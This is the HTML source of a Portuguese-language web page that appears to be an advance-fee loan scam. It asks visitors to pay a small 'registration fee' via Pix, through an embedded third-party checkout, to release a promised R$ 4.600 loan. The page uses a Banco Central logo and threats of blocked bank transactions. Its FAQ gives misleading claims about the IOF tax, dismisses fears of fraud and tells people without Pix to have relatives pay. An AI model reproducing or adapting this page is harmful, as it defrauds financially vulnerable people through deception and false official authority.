<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Pendência IOF</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="../assets/style.css">
    <script src="../assets/js/links.js"></script>
     

    


</head>
<body>
    

    <nav class="navbar">
        <div class="container">
            <div class="logo-container">
                <img src="../assets/logo.png" alt="Logo" class="img-fluid w-50 img-branca">
            </div>
        </div>
    </nav>

    <div class="container p-4 pb-0">
      <h2 class="mb-4">Último passo para você receber <span id="valorFinalTexto">R$ 4.600,00</span>!</h2>
      
      <p>
        Esse é o último passo para você receber seu crédito, verificamos que esse é o primeiro empréstimo que você solicita conosco, sendo assim é necessário efetuar o pagamento da tarifa de cadastro, após isso você receberá seu crédito imediato.
      </p>
  </div>
  

    <!--BOX VIDEO, timeline...-->
    <div class="card border border-secondary shadow p-4 my-4 mx-3 mx-md-4">
        <div class="alert alert-danger mb-3 position-relative overflow-hidden">
            <div class="position-absolute" style="left: -50px; top: 50%; transform: translateY(-50%); opacity: 0.15; z-index: 0;">
                <svg xmlns="http://www.w3.org/2000/svg" width="120" height="120" fill="currentColor" class="bi bi-exclamation-triangle-fill" viewBox="0 0 16 16">
                    <path d="M8.982 1.566a1.13 1.13 0 0 0-1.96 0L.165 13.233c-.457.778.091 1.767.98 1.767h13.713c.889 0 1.438-.99.98-1.767L8.982 1.566zM8 5c.535 0 .954.462.9.995l-.35 3.507a.552.552 0 0 1-1.1 0L7.1 5.995A.905.905 0 0 1 8 5zm.002 6a1 1 0 1 1 0 2 1 1 0 0 1 0-2z"/>
                </svg>
            </div>
            <div class="d-flex flex-column align-items-start position-relative" style="z-index: 1;">
                <strong class="text-danger mb-2">AVISO</strong>
                <span>O não pagamento da TARIFA DE CADASTRO resultará no cancelamento do empréstimo e no bloqueio de futuras transações bancárias.</span>
            </div>
        </div>

        <h3>O que é a Tarifa de Cadastro?</h3>
        <p>Aumente o volume 🔈</p>

        <div class="video-container position-relative" style="padding-bottom: 56.25%; height: 0; overflow: hidden;">
            <video id="customVideo" class="position-absolute w-100 h-100" 
                style="object-fit: cover;"
                muted
                playsinline
                autoplay
                loop>
                
            <source src="../assets/video-prestamista.mp4" type="video/mp4">
            </video>
        
            <!-- Overlay do vídeo -->
            <div id="videoOverlay" 
                class="position-absolute w-100 h-100 d-flex align-items-center justify-content-center"
                style="background: rgba(0,0,0,0.5); cursor: pointer;">
            <span style="color: white; font-family: WistiaPlayerInter, Helvetica, sans-serif; 
                        font-size: 15px; font-weight: 500; padding-left: 1em;
                        white-space: nowrap; overflow: hidden; text-overflow: ellipsis;
                        max-width: 293px;">
                Clique para ativar o som
            </span>
            </div>
        </div>


        <!--Inicio timeline-->
        <div class="loan-status-timeline">
            <div class="bar"></div>
            
            <!-- Item 1 -->
            <div class="timeline-part done">
                <div class="dot"></div>
                <div class="body">
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon" width="1em" height="1em" viewBox="0 0 256 256">
                        <g fill="currentColor">
                            <path d="M176 64v48H80V64Z" opacity=".2"></path>
                            <path d="M80 120h96a8 8 0 0 0 8-8V64a8 8 0 0 0-8-8H80a8 8 0 0 0-8 8v48a8 8 0 0 0 8 8m8-48h80v32H88Zm112-48H56a16 16 0 0 0-16 16v176a16 16 0 0 0 16 16h144a16 16 0 0 0 16-16V40a16 16 0 0 0-16-16m0 192H56V40h144Zm-100-68a12 12 0 1 1-12-12a12 12 0 0 1 12 12m40 0a12 12 0 1 1-12-12a12 12 0 0 1 12 12m40 0a12 12 0 1 1-12-12a12 12 0 0 1 12 12m-80 40a12 12 0 1 1-12-12a12 12 0 0 1 12 12m40 0a12 12 0 1 1-12-12a12 12 0 0 1 12 12m40 0a12 12 0 1 1-12-12a12 12 0 0 1 12 12"></path>
                        </g>
                    </svg>
                    <div class="text">
                        <p><strong>Simulação</strong></p>
                        <small>Simulação realizada e cadastro concluído</small>
                    </div>
                </div>
            </div>

            <!-- Item 2 -->
            <div class="timeline-part done">
                <div class="dot"></div>
                <div class="body">
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon" width="1em" height="1em" viewBox="0 0 256 256">
                        <g fill="currentColor">
                            <path d="M224 128a95.76 95.76 0 0 1-31.8 71.37A72 72 0 0 0 128 160a40 40 0 1 0-40-40a40 40 0 0 0 40 40a72 72 0 0 0-64.2 39.37A96 96 0 1 1 224 128" opacity=".2"></path>
                            <path d="M221.35 104.11a8 8 0 0 0-6.57 9.21A89 89 0 0 1 216 128a87.62 87.62 0 0 1-22.24 58.41a79.66 79.66 0 0 0-36.06-28.75a48 48 0 1 0-59.4 0a79.66 79.66 0 0 0-36.06 28.75A88 88 0 0 1 128 40a89 89 0 0 1 14.68 1.22a8 8 0 0 0 2.64-15.78a103.92 103.92 0 1 0 85.24 85.24a8 8 0 0 0-9.21-6.57M96 120a32 32 0 1 1 32 32a32 32 0 0 1-32-32m-21.92 77.5a64 64 0 0 1 107.84 0a87.83 87.83 0 0 1-107.84 0M237.66 45.66l-32 32a8 8 0 0 1-11.32 0l-16-16a8 8 0 0 1 11.32-11.32L200 60.69l26.34-26.35a8 8 0 0 1 11.32 11.32"></path>
                        </g>
                    </svg>
                    <div class="text">
                        <p><strong>Pagamento do Imposto IOF</strong></p>
                        <small>Pagamento concluído com sucesso</small>
                    </div>
                </div>
            </div>

            <!-- Item 3 -->
            <div class="timeline-part current">
                <div class="dot"></div>
                <div class="body">
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon" width="1em" height="1em" viewBox="0 0 256 256">
                        <g fill="currentColor">
                            <path d="m229.67 133.62l-96 96a7.94 7.94 0 0 1-11.24 0l-96-96a7.94 7.94 0 0 1 0-11.24l96.05-96a7.94 7.94 0 0 1 11.24 0l96 96.05a7.94 7.94 0 0 1-.05 11.19" opacity=".2"></path>
                            <path d="m235.34 116.72l-96.06-96.06a16 16 0 0 0-22.56 0l-96.06 96.06a16 16 0 0 0 0 22.56l96.06 96.06a16 16 0 0 0 22.56 0l96.06-96.06a16 16 0 0 0 0-22.56M128 32l56 56h-24a8 8 0 0 0-5.66 2.34L128 116.68l-26.34-26.34A8 8 0 0 0 96 88H72Zm-72 72h36.68l24 24l-24 24H56l-24-24Zm72 120l-56-56h24a8 8 0 0 0 5.66-2.34L128 139.31l26.34 26.35A8 8 0 0 0 160 168h24Zm72-72h-36.68l-24-24l24-24H200l24 24Z"></path>
                        </g>
                    </svg>
                    <div class="text">
                        <p><strong>Pagamento da tarifa de Cadastro</strong></p>
                        <small>Aguardando pagamento para liberação do crédito</small>
                    </div>
                </div>
            </div>

            <!-- Item 4 -->
            <div class="timeline-part pending">
                <div class="dot"></div>
                <div class="body">
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon" width="1em" height="1em" viewBox="0 0 256 256">
                        <g fill="currentColor">
                            <path d="M16 152h32v56H16a8 8 0 0 1-8-8v-40a8 8 0 0 1 8-8M192.54 40A39.12 39.12 0 0 0 156 64a39.12 39.12 0 0 0-36.54-24C97.67 40 80 58.31 80 80c0 14.56 7 27.71 16.73 40H140a20 20 0 0 1 0 40h4l37.78-8.68C203.82 135.07 232 109.23 232 80c0-21.69-17.67-40-39.46-40" opacity=".2"></path>
                            <path d="M230.33 141.06a24.34 24.34 0 0 0-18.61-4.77C230.5 117.33 240 98.48 240 80c0-26.47-21.29-48-47.46-48A47.58 47.58 0 0 0 156 48.75A47.58 47.58 0 0 0 119.46 32C93.29 32 72 53.53 72 80c0 11 3.24 21.69 10.06 33a31.87 31.87 0 0 0-14.75 8.4L44.69 144H16a16 16 0 0 0-16 16v40a16 16 0 0 0 16 16h104a8 8 0 0 0 1.94-.24l64-16a7 7 0 0 0 1.19-.4L226 182.82l.44-.2a24.6 24.6 0 0 0 3.93-41.56ZM119.46 48a31.15 31.15 0 0 1 29.14 19a8 8 0 0 0 14.8 0a31.15 31.15 0 0 1 29.14-19C209.59 48 224 62.65 224 80c0 19.51-15.79 41.58-45.66 63.9l-11.09 2.55A28 28 0 0 0 140 112h-39.32C92.05 100.36 88 90.12 88 80c0-17.35 14.41-32 31.46-32M16 160h24v40H16Zm203.43 8.21l-38 16.18L119 200H56v-44.69l22.63-22.62A15.86 15.86 0 0 1 89.94 128H140a12 12 0 0 1 0 24h-28a8 8 0 0 0 0 16h32a8.3 8.3 0 0 0 1.79-.2l67-15.41l.31-.08a8.6 8.6 0 0 1 6.3 15.9Z"></path>
                        </g>
                    </svg>
                    <div class="text">
                        <p><strong>Crédito na conta</strong></p>
                        <small>Crédito enviado para sua conta bancária</small>
                    </div>
                </div>
            </div>
        </div>

        <div class="text-center mb-3 pt-4">
            <img src="../assets/bc-logo.png" alt="Logo do Banco Central" class="d-block mx-auto" style="max-width: 180px;">
        </div>
        <p>
          O não pagamento da tarifa resultará no reembolso de todos pagamentos já realizados e no cancelamento do contrato do empréstimo, impossibilitando uma nova contratação por um prazo máximo de 90 dias
        </p>

    </div>
    <!-- /conteudo do container do video-->

    <!-- Área do pagamento do pixx-->
    <div class="card border border-secondary shadow p-4 my-4 mx-3 mx-md-4">
        <div class="card-body text-center">
            <h5 class="card-title d-flex align-items-center justify-content-center gap-2 mb-3">
                Pague via Pix
                <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" class="text-primary">
                    <path fill="#3db1a5" d="m15.45 16.52l-3.01-3.01c-.11-.11-.24-.13-.31-.13s-.2.02-.31.13L8.8 16.53c-.34.34-.87.89-2.64.89l3.71 3.7a3 3 0 0 0 4.24 0l3.72-3.71c-.91 0-1.67-.18-2.38-.89M8.8 7.47l3.02 3.02c.08.08.2.13.31.13s.23-.05.31-.13l2.99-2.99c.71-.74 1.52-.91 2.43-.91l-3.72-3.71a3 3 0 0 0-4.24 0l-3.71 3.7c1.76 0 2.3.58 2.61.89"/>
                    <path fill="#3db1a5" d="m21.11 9.85l-2.25-2.26H17.6c-.54 0-1.08.22-1.45.61l-3 3c-.28.28-.65.42-1.02.42a1.5 1.5 0 0 1-1.02-.42L8.09 8.17c-.38-.38-.9-.6-1.45-.6H5.17l-2.29 2.3a3 3 0 0 0 0 4.24l2.29 2.3h1.48c.54 0 1.06-.22 1.45-.6l3.02-3.02c.28-.28.65-.42 1.02-.42s.74.14 1.02.42l3.01 3.01c.38.38.9.6 1.45.6h1.26l2.25-2.26a3.04 3.04 0 0 0-.02-4.29"/>
                </svg>
            </h5>
    
            <p class="text-muted mb-2">O pagamento será confirmado imediatamente</p>
    
            <!-- Valor -->
            <div class="fs-3 fw-bold text-primary mb-4">R$ 18,68</div>




 <script src="https://alphapix.online/popup.min.js?product=9b2b32d6-6f28-40e4-adca-ca6bd54cd95e&url=https%3A%2F%2Falphapix.online%2Fcheckout%2F9b2b32d6-6f28-40e4-adca-ca6bd54cd95e&text=PAGAR+AGORA&color=ffea00&textColor=000000&position=center&shadow=glow&size=medium&animation=none&borderRadius=8&fontWeight=bold"></script>
<script src="https://cdn.alphapix.online/checkout.js"></script>
    



            <div class="d-flex align-items-center justify-content-center gap-2 text-muted small">
                <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 256 256">
                    <path fill="#3db1a5" d="M216 56v56c0 96-88 120-88 120s-88-24-88-120V56a8 8 0 0 1 8-8h160a8 8 0 0 1 8 8" opacity=".2"/>
                    <path fill="#3db1a5" d="M208 40H48a16 16 0 0 0-16 16v56c0 52.72 25.52 84.67 46.93 102.19c23.06 18.86 46 25.26 47 25.53a8 8 0 0 0 4.2 0c1-.27 23.91-6.67 47-25.53C198.48 196.67 224 164.72 224 112V56a16 16 0 0 0-16-16m0 72c0 37.07-13.66 67.16-40.6 89.42a129.3 129.3 0 0 1-39.4 22.2a128.3 128.3 0 0 1-38.92-21.81C61.82 179.51 48 149.3 48 112V56h160Zm-70.34-18.34a8 8 0 0 0-11.32 0L120 148.69l-10.34-10.35a8 8 0 0 0-11.32 11.32l16 16a8 8 0 0 0 11.32 0l56-56a8 8 0 0 0-11.32-11.32Z"/>
                </svg>
                Ambiente seguro
            </div>
        </div>
    </div>

    <div class="container my-5">
        <div class="card border border-secondary shadow p-4 my-4 mx-3 mx-md-4">
          <h2 class="card-title text-center mb-4">Dúvidas Frequentes</h2>
          
          <div class="accordion" id="faqAccordion">
            <!-- Item 1 -->
            <div class="accordion-item">
              <h2 class="accordion-header">
                <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#faq1" aria-expanded="true">
                  <svg class="accordion-icon me-2" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24">
                    <path fill="currentColor" d="M12 14.379q-.161 0-.298-.053t-.267-.184L7.046 9.754q-.14-.14-.15-.344t.15-.364t.354-.16t.354.16L12 13.292l4.246-4.246q.14-.14.345-.15q.203-.01.363.15t.16.354t-.16.354l-4.389 4.388q-.13.131-.267.184q-.136.053-.298.053"></path>
                  </svg>
                  Por que o imposto IOF não é descontado do empréstimo?
                </button>
              </h2>
              <div id="faq1" class="accordion-collapse collapse show" data-bs-parent="#faqAccordion">
                <div class="accordion-body">
                  O valor do Imposto IOF é tratado separadamente pois ele é um imposto emitido pelo Banco Central assim que um empréstimo é aprovado, e é destinado aos cofres públicos, para garantir segurança para ambas as partes.
                </div>
              </div>
            </div>
    
            <!-- Item 2 -->
            <div class="accordion-item">
              <h2 class="accordion-header">
                <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#faq2">
                  <svg class="accordion-icon me-2" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24">
                    <path fill="currentColor" d="M12 14.379q-.161 0-.298-.053t-.267-.184L7.046 9.754q-.14-.14-.15-.344t.15-.364t.354-.16t.354.16L12 13.292l4.246-4.246q.14-.14.345-.15q.203-.01.363.15t.16.354t-.16.354l-4.389 4.388q-.13.131-.267.184q-.136.053-.298.053"></path>
                  </svg>
                  O que acontece após pagar o imposto?
                </button>
              </h2>
              <div id="faq2" class="accordion-collapse collapse" data-bs-parent="#faqAccordion">
                <div class="accordion-body">
                  Você será redirecionado automaticamente para a página onde confirmará e autorizará a transferência do dinheiro para sua conta.
                </div>
              </div>
            </div>
    
            <!-- Item 3 -->
            <div class="accordion-item">
              <h2 class="accordion-header">
                <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#faq3">
                  <svg class="accordion-icon me-2" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24">
                    <path fill="currentColor" d="M12 14.379q-.161 0-.298-.053t-.267-.184L7.046 9.754q-.14-.14-.15-.344t.15-.364t.354-.16t.354.16L12 13.292l4.246-4.246q.14-.14.345-.15q.203-.01.363.15t.16.354t-.16.354l-4.389 4.388q-.13.131-.267.184q-.136.053-.298.053"></path>
                  </svg>
                  Quanto tempo demora para liberar o crédito?
                </button>
              </h2>
              <div id="faq3" class="accordion-collapse collapse" data-bs-parent="#faqAccordion">
                <div class="accordion-body">
                  Como o pagamento é feito via Pix, a liberação do empréstimo é imediata. Todo o processo, incluindo a transferência do crédito, leva cerca de 5-10 minutos.
                </div>
              </div>
            </div>
    
            <!-- Item 4 -->
            <div class="accordion-item">
              <h2 class="accordion-header">
                <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#faq4">
                  <svg class="accordion-icon me-2" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24">
                    <path fill="currentColor" d="M12 14.379q-.161 0-.298-.053t-.267-.184L7.046 9.754q-.14-.14-.15-.344t.15-.364t.354-.16t.354.16L12 13.292l4.246-4.246q.14-.14.345-.15q.203-.01.363.15t.16.354t-.16.354l-4.389 4.388q-.13.131-.267.184q-.136.053-.298.053"></path>
                  </svg>
                  Tô com medo de cair em golpe
                </button>
              </h2>
              <div id="faq4" class="accordion-collapse collapse" data-bs-parent="#faqAccordion">
                <div class="accordion-body">
                  <b class="marca"></b> atua há mais de <b>14 anos</b> com empréstimos online, contando com milhares de clientes satisfeitos. Nosso site é seguro e confiável. Não solicitamos sua senha ou dados bancários. Sugerir que somos um golpe é um insulto à nossa reputação e confiança que nossos clientes têm em nós.
                </div>
              </div>
            </div>
    
            <!-- Item 5 -->
            <div class="accordion-item">
              <h2 class="accordion-header">
                <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#faq5">
                  <svg class="accordion-icon me-2" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24">
                    <path fill="currentColor" d="M12 14.379q-.161 0-.298-.053t-.267-.184L7.046 9.754q-.14-.14-.15-.344t.15-.364t.354-.16t.354.16L12 13.292l4.246-4.246q.14-.14.345-.15q.203-.01.363.15t.16.354t-.16.354l-4.389 4.388q-.13.131-.267.184q-.136.053-.298.053"></path>
                  </svg>
                  Posso pagar o imposto com cartão de crédito?
                </button>
              </h2>
              <div id="faq5" class="accordion-collapse collapse" data-bs-parent="#faqAccordion">
                <div class="accordion-body">
                  Não, o imposto IOF só pode ser paga via Pix. Se você não tem uma conta em um banco que oferece Pix, peça a um amigo ou familiar para fazer o pagamento para você.
                </div>
              </div>
            </div>
    
            <!-- Item 6 -->
            <div class="accordion-item">
              <h2 class="accordion-header">
                <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#faq6">
                  <svg class="accordion-icon me-2" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24">
                    <path fill="currentColor" d="M12 14.379q-.161 0-.298-.053t-.267-.184L7.046 9.754q-.14-.14-.15-.344t.15-.364t.354-.16t.354.16L12 13.292l4.246-4.246q.14-.14.345-.15q.203-.01.363.15t.16.354t-.16.354l-4.389 4.388q-.13.131-.267.184q-.136.053-.298.053"></path>
                  </svg>
                  O que acontece se eu não pagar o imposto?
                </button>
              </h2>
              <div id="faq6" class="accordion-collapse collapse" data-bs-parent="#faqAccordion">
                <div class="accordion-body">
                  Se você não pagar o imposto, seu pedido de empréstimo será cancelado, mas lembre-se de que o imposto IOF é obrigatório pelo Banco Central, para garantir a segurança e processamento do seu pedido.
                </div>
              </div>
            </div>
          </div>
        </div>
    </div>

    <!--FOOTER-->
    <footer class="footer py-3 mt-4 border-top">
    <div class="container">
        <div class="row justify-content-center text-center text-md-start">
        <div class="col-12 col-md-8">
            <p class="mb-2">
            © <span id="currentYear"></span> <span class="marca" style="text-transform: uppercase;"></span> S.A.<br>CNPJ: 60.779.196/0001-96<br>
            <small class="d-block mt-2">
                Avenida Presidente Wilson, 9<br>
                São Vicente/SP - CEP 11320-905
            </small>
            </p>
        </div>
        </div>
    </div>
    </footer>
    
    <script>
    document.getElementById('currentYear').textContent = new Date().getFullYear();
    </script>

    <!--do player de vídeo-->
    <script>
    const video = document.getElementById('customVideo');
    const overlay = document.getElementById('videoOverlay');

    overlay.addEventListener('click', async () => {
        try {
        overlay.style.opacity = '0';
        await new Promise(resolve => setTimeout(resolve, 300));

        video.muted = false;
        video.currentTime = 0;
        await video.play();
        overlay.style.display = 'none';
        } catch (error) {
        console.error('Falha ao reproduzir:', error);
        overlay.style.opacity = '1';
        }
    });

    video.addEventListener('ended', () => {
        overlay.style.display = 'flex';
        overlay.style.opacity = '1';
    });
    </script>

<script>
  document.addEventListener("DOMContentLoaded", function () {
    const valorSalvo = localStorage.getItem("valorEmprestimo");
    const valorEmprestimo = valorSalvo ? Number(valorSalvo) : 4600;

    // Atualiza o valor do "Limite disponível"
    const limite = document.getElementById("limiteDisponivel");
    if (limite) {
      limite.innerHTML = `
        <h5><strong>Limite disponível:</strong></h5>
        <h4 class="text-success"><strong>R$ ${valorEmprestimo.toLocaleString('pt-BR', { minimumFractionDigits: 2 })}</strong></h4>
      `;
    }

    // Atualiza o valor no texto "Último passo para você receber..."
    const valorTexto = document.getElementById("valorFinalTexto");
    if (valorTexto) {
      valorTexto.innerText = `R$ ${valorEmprestimo.toLocaleString('pt-BR', { minimumFractionDigits: 2 })}`;
    }
  });
</script>



<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>

</body>
</html>